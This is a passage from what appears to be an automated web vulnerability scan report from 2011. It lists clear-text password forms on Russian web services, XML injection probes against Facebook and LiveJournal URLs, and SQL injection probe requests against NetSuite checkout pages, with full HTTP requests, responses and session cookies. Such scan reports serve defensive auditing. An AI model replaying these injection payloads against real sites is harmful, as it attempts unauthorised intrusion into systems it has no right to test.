Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
</a><form class="b-domik b-domik_type_popup g-js g-hidden" action="http://passport.yandex.ru/passport?mode=auth&amp;from=direct&amp;retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl" method="post"onclick="return {name: 'b-domik_type_popup', title: '', register:'', regMode:''}"
>
<input name="login"/>
<input name="passwd" type="password"/>
<input name="twoweeks" type="checkbox" value="yes"/>
...[SNIP]...

8.2. http://direct.yandex.ru/pages/direct/_direct-1303387947.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://direct.yandex.ru/pages/direct/_direct-1303387947.js

The form contains the following password field:

passwd

Request

GET /pages/direct/_direct-1303387947.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:36 GMT
Cache-Control: max-age=86400
Content-Length: 432639

var ADDRESS_STREET_PREFIXES="",ALLOW_LETTERS="abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ......................................................................................................
...[SNIP]...
ion_popup-50-50")&&window.scrollTo(0,0);d.show().find("input[name=login]").focus();b(document).trigger("show.b-domik_type_popup")}function e(){b(document).unbind(".b-domik");d.hide()}function h(){d=b('<form class="'+g.attr("class").replace("g-hidden","")+'"><i class="b-domik__roof">
...[SNIP]...
<div class="b-input"><input class="b-input__text" id="b-domik_popup-password" name="passwd" value="'+g.find("input[name=passwd]").val()+'" type="password" tabindex="11"/></div>
...[SNIP]...

8.3. http://mail.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mail.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://e.mail.ru/cgi-bin/auth

The form contains the following password field:

Password

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<div class="relative z100 m">
<form name="Auth" method="post" action="http://e.mail.ru/cgi-bin/auth" style="overflow: hidden;">

<img src="http://limg.imgsmail.ru/mail/ru/images/log_bms.gif" width="226" height="18" usemap="#logbms" alt="" />
...[SNIP]...
<td><input type="password" class="long" size="15" name="Password" tabindex="5"
value="" /></td>
...[SNIP]...

8.4. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password field:

pass

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td><form action="#" onsubmit="f_input(this); return false;" >';
       str+='E-mail:<br>
...[SNIP]...
<br><input name="pass" type="password" value="" size=20 onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

8.5. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password fields:

pass
pass2

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

8.6. http://odnoklassniki.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://odnoklassniki.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&st.cmd=anonymLogin&tkn=6956

The form contains the following password field:

st.password

Request

GET / HTTP/1.1
Host: odnoklassniki.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="panelBox_body"><form action="http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&st.cmd=anonymLogin&tkn=6956" method="post"><input value="" type="hidden" name="st.redirect">
...[SNIP]...
</label><input id="field_password" maxlength="" name="st.password" value="" class="fi" type="password" size="20"><div class="checkbox">
...[SNIP]...

8.7. http://pda.loveplanet.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pda.loveplanet.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://pda.loveplanet.ru/a-logon/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: pda.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...
<div class="bl_login bg_lightgray">
<form method="post" action="/a-logon/" name="login">
<input type="hidden" name="a" value="logon">
...[SNIP]...
<nobr>............ <input type="password" class="itxt" size="5" name="password" id="password"></nobr>
...[SNIP]...

8.8. http://pretty.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pretty.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://pretty.ru/a-logon/

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru
Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru
Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:24:33 GMT
Content-Length: 59765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8
...[SNIP]...
<td>
        <form method="post" action="/a-logon/" name="login">
<input type="hidden" name="a" value="logon">
...[SNIP]...
<input type="text" name="auid" id="auid" size="10">
            ............ <input type="password" size="10" name="password" id="password">
            <input type="submit" value=".........." class="button">
...[SNIP]...

8.9. http://vkontakte.ru/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://vkontakte.ru
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://login.vk.com/?act=login

The form contains the following password field:

pass

Request

GET / HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:04 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: remixchk=5; expires=Tue, 17-Apr-2012 02:49:46 GMT; path=/; domain=.vkontakte.ru
Pragma: no-cache
Cache-control: no-store
Vary: Accept-Encoding
Content-Length: 12904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<script type="
...[SNIP]...
<div id="quick_login">
<form method="POST" name="login" id="quick_login_form" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
<input type="hidden" name="act" value="login" />
...[SNIP]...
<div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="quick_pass" /></div>
...[SNIP]...

8.10. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.marketgid.com
Path:	/pnews/773204/i/7269/pp/2/1/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://usr.marketgid.com/creative/auth/

The form contains the following password field:

pass

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div class="menu_body" style="margin-bottom:5px">
<form id="mg-auth-form-1" action="http://usr.marketgid.com/creative/auth/" method="post">
<div>
...[SNIP]...
</div>
<input id="pass" type="password" name="pass" value=".........." size="25" tabindex="2" onfocus="form_change(this)" onblur="form_change(this)" /><input class="submit-button" type="submit" value="........" tabindex="3" />
...[SNIP]...

9. XML injection previous next
There are 4 instances of this issue:

http://api.facebook.com/restserver.php [format parameter]
http://l-files.livejournal.net/userapps/4/image [REST URL parameter 1]
http://l-files.livejournal.net/userapps/4/image [REST URL parameter 2]
http://l-files.livejournal.net/userapps/4/image [REST URL parameter 3]

9.1. http://api.facebook.com/restserver.php [format parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.eset.com%2Fus%2Fhome%2Fsmart-security%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 25 Apr 2011 08:22:36 -0700
Pragma:
X-FB-Rev: 370179
X-FB-Server: 10.32.44.124
X-Cnection: close
Date: Mon, 25 Apr 2011 15:20:36 GMT
Content-Length: 773

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

9.2. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://l-files.livejournal.net
Path:	/userapps/4/image

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps]]>>/4/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:05:37 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 1987947190
Age: 0
Via: 1.1 varnish
Content-Length: 368
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

9.3. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://l-files.livejournal.net
Path:	/userapps/4/image

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps/4]]>>/image?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:05:50 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 1698422522
Age: 0
Via: 1.1 varnish
Content-Length: 368
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

9.4. http://l-files.livejournal.net/userapps/4/image [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://l-files.livejournal.net
Path:	/userapps/4/image

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /userapps/4/image]]>>?v=1297757136 HTTP/1.1
Host: l-files.livejournal.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 15:06:06 GMT
Content-Type: text/html; charset=utf-8
Retry-After: 0
X-Varnish: 610014231
Age: 0
Via: 1.1 varnish
Content-Length: 367
Connection: keep-alive

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>200 OK</title>
</hea
...[SNIP]...

10. SQL statement in request parameter previous next
There are 8 instances of this issue:

https://checkout.netsuite.com/core/media/media.nl
https://checkout.netsuite.com/core/styles/pagestyles.nl
https://checkout.netsuite.com/pages/portal/page_not_found.jsp
https://checkout.netsuite.com/s.nl
https://employer.unicru.com/asp/home/login.asp
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
http://learn.shavlik.com/shavlik/index.cfm

10.1. https://checkout.netsuite.com/core/media/media.nl previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/core/media/media.nl

Request

GET /core/media/media.nl?id=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&c=NLCORP&h=65bae699770c58b12c10 HTTP/1.1
Referer: https://checkout.netsuite.com/pages/portal/page_not_found.jsp?internal=F
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=fspzN1GhTphyBQvLpyGdlJdh6BL8whyTwq2X78f8hxRthNWT2Z3jy4GGPSzLlnVZdyGJQxSTzT2hfvnn6y9XwhnznRTRZbMw6QGzXJcyQ2jBFp97np87tTDKTCTHXpxD!-1598522165; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 206 Partial Content
Date: Mon, 25 Apr 2011 14:28:11 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1700483469:616363742D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 1983

<html><head><title>Notice</title>
<meta http-equiv='Content-Type' content='text/html; charset=UTF-8'>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=103&bglt=F2F4F6&bgmd=FFFFFF&bgdk=737A82
...[SNIP]...

10.2. https://checkout.netsuite.com/core/styles/pagestyles.nl previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/core/styles/pagestyles.nl

Request

GET /core/styles/pagestyles.nl?ct=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crumbtext=C4C8CF&headertext=B5C1D5&ontab=FFFFFF&offtab=000000&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=C0CAD9&portletlabel=000000&bgbutton=FFE599&bgrequiredfld=FFFFE5&font=Verdana%2CHelvetica%2Csans-serif&size_site_content=9pt&size_site_title=9pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3=3 HTTP/1.1
Referer: https://checkout.netsuite.com/s.nl?c=438708&sc=4&whence=&n=1&ext=T
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=pbWBN1GZpsFMMPGgD9fLtR1NsNxGljmTjF8P6kCVL9tLVKlFGB6qxvrttG2GmQHnFDK4npSP202Q0Q5SDBy6smMPTW80GnM5p2KvFCT1Xnpb36YTfw4s4JZlBHvMLJsr!1726784262; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:09 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:09 GMT
Last-Modified: Mon, 25 Apr 2011 14:27:09 GMT
NS_RTIMER_COMPOSITE: 777140821:616363742D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 69389

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...

10.3. https://checkout.netsuite.com/pages/portal/page_not_found.jsp previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	https://checkout.netsuite.com
Path:	/pages/portal/page_not_found.jsp

Request

GET /pages/portal/page_not_found.jsp?internal=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: https://checkout.netsuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2010.2.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:27:02 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 791381320:616363742D6A6176613034382E7376616C652E6E65746C65646765722E636F6D:80
